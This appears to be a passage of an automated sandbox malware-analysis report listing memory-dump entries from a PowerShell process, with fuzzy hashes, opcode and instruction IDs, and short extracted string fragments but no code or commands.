                                                                                                        • API String ID: 0-328666906
                                                                                                        • Opcode ID: e9ec92dec0bdb8c4b2d9a4fa8b1b962b78408591e938a7dfa8bc007b1d05686d
                                                                                                        • Instruction ID: 134d27ac5d38cf071b3020d6ba13c5c86d5bf471f3f998e307540d61f0ebc375
                                                                                                        • Opcode Fuzzy Hash: e9ec92dec0bdb8c4b2d9a4fa8b1b962b78408591e938a7dfa8bc007b1d05686d
                                                                                                        • Instruction Fuzzy Hash: 80715DB9B00706BFDB258F24E811B7ABBA2BF89210F148455D8859B7C8DB31DD41C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q
                                                                                                        • API String ID: 0-492062855
                                                                                                        • Opcode ID: 6827b946e7599a318f8c999f34ad326b5c8b027340142eb9fa56e9203e2d0d38
                                                                                                        • Instruction ID: 39ef4a207de322d503cee0ef1e96b2f7db066aeca2747e0624e06c0124487d38
                                                                                                        • Opcode Fuzzy Hash: 6827b946e7599a318f8c999f34ad326b5c8b027340142eb9fa56e9203e2d0d38
                                                                                                        • Instruction Fuzzy Hash: D0A18DBA7043169FD7268A799811776BFE1AFCA210F1980BBD845CB2D1EB31CD41C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$4'q$4'q$x.k$-k
                                                                                                        • API String ID: 0-3499190445
                                                                                                        • Opcode ID: ed61cf40d264e9c30a99311cb2617df6ca77ff569f00075554e192ce754c6e79
                                                                                                        • Instruction ID: 8e9519bdf12e2c12a1b494593adc570927511be2fb652eed106038a9af1c29d6
                                                                                                        • Opcode Fuzzy Hash: ed61cf40d264e9c30a99311cb2617df6ca77ff569f00075554e192ce754c6e79
                                                                                                        • Instruction Fuzzy Hash: C8126DB4A003199FDB25DB54C955BDABBB2BF89300F1081E9D9096F781CB72AD81CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XRq$XRq$XRq$tPq$tPq$$q
                                                                                                        • API String ID: 0-422185277
                                                                                                        • Opcode ID: ee5168dd0c83e324323950f6993b7613b7bc3f9f9c39f7e2eb862cc5348855d9
                                                                                                        • Instruction ID: 2d190c1ec762f7bb8fd78fba4abfa62e26c75b67de2211ca8b1ee825abcaa3f4
                                                                                                        • Opcode Fuzzy Hash: ee5168dd0c83e324323950f6993b7613b7bc3f9f9c39f7e2eb862cc5348855d9
                                                                                                        • Instruction Fuzzy Hash: 8B613D75B10206AFDB259B68C45276ABBB2FF89310F28C569E8059F3C1CB31DD49C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPq$tPq$$q$$q$$q$$q
                                                                                                        • API String ID: 0-3638282964
                                                                                                        • Opcode ID: 98669ea36ccfe742e66053df9de444a1f018f5ab99b2703ef811fcf799fb7a93
                                                                                                        • Instruction ID: 0121548c247bdda88b93ab9c75b0362d9a58bbffbf5c2324c2217931f0e76d72
                                                                                                        • Opcode Fuzzy Hash: 98669ea36ccfe742e66053df9de444a1f018f5ab99b2703ef811fcf799fb7a93
                                                                                                        • Instruction Fuzzy Hash: 59518EB9B0434ABFDB264A6D9810766BBB2AFC6311F1C806BE546CB2C1DB71C841C391
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 79f3724aee16b691ea9205047a0f6f80691d1fec3f2e6cb14cb8ec0c568daefe
                                                                                                        • Instruction ID: 0b40c416ab14a72ef1e5de9aeaabfb3f92315a3ac8be682e01f972fc59e21571
                                                                                                        • Opcode Fuzzy Hash: 79f3724aee16b691ea9205047a0f6f80691d1fec3f2e6cb14cb8ec0c568daefe
                                                                                                        • Instruction Fuzzy Hash: AE5125B9B0020AEFDB2A8E65D4057AA7BA5EF85311F15C06AE8059F2D1C730DD43CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 4837f4cd94a6481fc355746183b85f01787b6a471467f4a5ad7e879ce68883d3
                                                                                                        • Instruction ID: 52ecacc7ddbf3ac83b6409c03a95b2ea04a04faa02fe500b45631a57232af8c5
                                                                                                        • Opcode Fuzzy Hash: 4837f4cd94a6481fc355746183b85f01787b6a471467f4a5ad7e879ce68883d3
                                                                                                        • Instruction Fuzzy Hash: DF4128B4B04306EFDB2A4A3598207BA7FB5AFC9214F15846AD906CB2C1EB31CD41C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 877cd72cead4d5a967337b160435cfe1435f6aec40a5bc5c9aac8bbc6eb587ce
                                                                                                        • Instruction ID: bc5c51f300f7e41163e9203eaa175579da8abb7fb24922d108f1d229a4229ad3
                                                                                                        • Opcode Fuzzy Hash: 877cd72cead4d5a967337b160435cfe1435f6aec40a5bc5c9aac8bbc6eb587ce
                                                                                                        • Instruction Fuzzy Hash: 09411ABDB08207FFDF2A4A65A40017AB7F3AF81221F29856AFC158B1D1DB31C961C751
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                                                                        • API String ID: 0-170447905
                                                                                                        • Opcode ID: 8890adfcb76d353342c10f9614498d32db552d3c91838593e28b013805ff2c04
                                                                                                        • Instruction ID: 6d8f8dffda24e33141beb81fe09bdddec5da1f96a70c24cf989c9975fe4e00f1
                                                                                                        • Opcode Fuzzy Hash: 8890adfcb76d353342c10f9614498d32db552d3c91838593e28b013805ff2c04
                                                                                                        • Instruction Fuzzy Hash: 25315DBA714707EBDB3A06657440376B7A1ABC5111B64807ED8C2C7ACDDB75C401C391
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                                                        • API String ID: 0-706544200
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oq$(oq$(oq$(oq
                                                                                                        • API String ID: 0-3853041632
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $q$$q$$q$$q
                                                                                                        • API String ID: 0-4102054182
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0#At$4'q$4'q$X#j
                                                                                                        • API String ID: 0-1147965119
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$h#j$$q
                                                                                                        • API String ID: 0-1248868988
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'q$4'q$$q$$q
                                                                                                        • API String ID: 0-3199993180